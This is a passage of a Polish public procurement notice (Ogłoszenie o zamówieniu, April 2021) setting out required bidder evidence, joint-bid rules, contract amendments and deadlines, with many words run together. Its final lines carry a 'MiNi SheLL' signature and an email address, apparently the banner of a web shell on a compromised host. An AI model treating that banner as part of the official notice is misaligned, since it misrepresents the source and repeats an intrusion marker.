udostępniającychzasoby,przedstawia,wraz z oświadczeniami, o których mowa powyżej, także oświadczeniapodmiotuudostępniającegozasoby, potwierdzające brak podstaw wykluczenia tego podmiotu orazodpowiedniospełnianiewarunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakimwykonawcapowołuje sięna jego zasoby (dla każdego z tych podmiotów odrębnie (zał. 2A)).2.Zobowiązaniepodmiotuudostępniającego zasoby. Zobowiązanie podmiotu udostępniającego zasoby do oddania mudodyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lubinnypodmiotowyśrodek dowodowy potwierdzający, że Wykonawca realizując zamówienie,będziedysponowałniezbędnymi zasobami tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej ofertywezwieWykonawcę,którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,niekrótszym niż 5 dni,aktualnych na dzień złożenia, następujących podmiotowychśrodkówdowodowych:1. Dokumentydotyczące przynależności do grupy kapitałowejOświadczeniewykonawcy,w zakresie art. 108 ust. 1 pkt5 ustawy PZP, o braku przynależności do tej samej grupykapitałowej, wrozumieniu ustawy z dnia16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z2019 r. poz.369), z innym wykonawcą,który złożył odrębną ofertę lub ofertę częściową, albooświadczenia oprzynależności do tej samejgrupy kapitałowej wraz z dokumentami lub informacjamipotwierdzającymiprzygotowanie oferty luboferty częściowej niezależnie od innego wykonawcynależącego do tej samejgrupy kapitałowej - wzórzałącznik nr 6 do SWZ;2. Wykazu usług wykonanych,a w przypadkuświadczeń powtarzających się lubciągłych również wykonywanych, w okresie ostatnich 3lat, a jeżeliokres prowadzenia działalności jestkrótszy – w tym okresie, wraz z podaniem ich wartości,przedmiotu,dat wykonania i podmiotów, narzecz których dostawy zostały wykonane lub sąwykonywane, orazzałączeniem dowodówokreślających, czy te usługi zostały wykonane lub sąwykonywane należycie,przy czym dowodami, októrych mowa, są referencje bądź inne dokumentysporządzone przez podmiot,na rzecz któregodostawy lub usługi zostały wykonane, a w przypadkuświadczeń powtarzających sięlub ciągłych sąwykonywane, a jeżeli wykonawca z przyczynniezależnych od niego nie jest w stanieuzyskać tychdokumentów – oświadczenie wykonawcy; Wprzypadku świadczeń powtarzających się lubciągłychnadal wykonywanych referencje bądź innedokumenty potwierdzające ich należytewykonywaniepowinny być wystawione w okresie ostatnich 3miesięcy; Jeżeli wykonawca powołuje sięnadoświadczenie w realizacji dostaw lub usługwykonywanych wspólnie z innymi wykonawcami,wwykazie należy wskazać dostawy lub usługi, wktórych wykonaniu wykonawca tenbezpośredniouczestniczył, a w przypadku świadczeńpowtarzających się lub ciągłych, w którychwykonywaniubezpośrednio uczestniczył lub uczestniczy.3.Wykaz osób wyznaczonych dorealizacjizamówienia.Wykaz osób, skierowanych przez wykonawcę dorealizacji zamówieniapublicznego, wszczególności odpowiedzialnych za świadczenie usług, kontrolęjakości lub kierowanierobotamibudowlanymi, wraz z informacjami na temat ich kwalifikacjizawodowych, uprawnień,doświadczenia iwykształcenia niezbędnych do wykonania zamówieniapublicznego, a także zakresuwykonywanychprzez nie czynności oraz informacją o podstawie dodysponowania tymi osobami.4. Wodniesieniu dowarunków dotyczących wykształcenia, kwalifikacjizawodowych lub doświadczeniawykonawcywspólnie ubiegający się o udzielenie zamówieniazobowiązani są do złożenia oświadczenia(formularzoferty) z którego wynika, które roboty budowlane,dostawy lub usługi wykonająposzczególniwykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda wraz z ofertą złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty. Do przygotowania oferty zaleca się skorzystanie zFormularzaoferty,stanowiącego załącznik Nr 1 do SWZ. W przypadku gdy Wykonawca niekorzystazprzygotowanego przez Zamawiającego wzoru Formularza oferty, ofertapowinnazawieraćwszystkie informacje wymagane we wzorze.2. Pełnomocnictwo lubinnydokumentpotwierdzający umocowanie do reprezentowania wykonawcy.Upoważnienieosóbpodpisującychofertę wynikać musi bezpośrednio z dokumentów dołączonych do oferty.Jeżeliupoważnienietakie nie wynika wprost z dokumentów rejestrowych (KRS, CEiDG lubinnegowłaściwegorejestru), to do oferty należy dołączyć inny dokument potwierdzającyumocowaniedoreprezentowania wykonawcy.3. W przypadku gdy Wykonawca polega nazasobachpodmiotutrzeciego:-Zobowiązanie podmiotu udostępniającego zasoby lub innypodmiotowyśrodekdowodowy (jeżeli Wykonawca polega na zdolnościach lub sytuacjipodmiotówudostępniającychzasoby na podstawie art. 118 ustawy Pzp)-Oświadczenie o niepodleganiuwykluczeniu orazspełnianiu warunków udziału w postępowaniu (zał. 2A) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. WtakimprzypadkuWykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowaniaichwpostępowaniu o udzielenie zamówienia albo do reprezentowania wpostępowaniuizawarciaumowy w sprawie zamówienia publicznego. 2. Pełnomocnictwo należydołączyćdooferty i powinno ono zawierać w szczególności wskazanie:1) postępowaniaoudzieleniezamówieniepublicznego, którego dotyczy;2) wszystkich Wykonawcówubiegającychsię wspólnieo udzielenie zamówienia;3) ustanowionego pełnomocnika orazzakresujegoumocowania.3.Zamawiający nie określa sposobu spełniania warunków udziałuwpostępowaniuprzez wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają formy pisemnej (aneksu) pod rygorem nieważności.2.Zmiany Umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art.454 oraz 455 ustawy Prawo zamówień publicznych.3. Dopuszcza się następujące zmianyumowy w przypadku: a) gdy nastąpiła zmiana przepisów prawa powszechnie obowiązującego,która ma wpływ na termin, sposób lub zakres realizacji przedmiotu umowy, b) terminówrealizacji z uwagi na okoliczności, których nie można było przewidzieć po stronie Zamawiającegolub z przyczyn niezależnych od Wykonawcy,c) ograniczenia zakresu prac objętych niniejsząumową w przypadku stwierdzenia braku konieczności wykonywania części zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-27 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-26</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-19 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com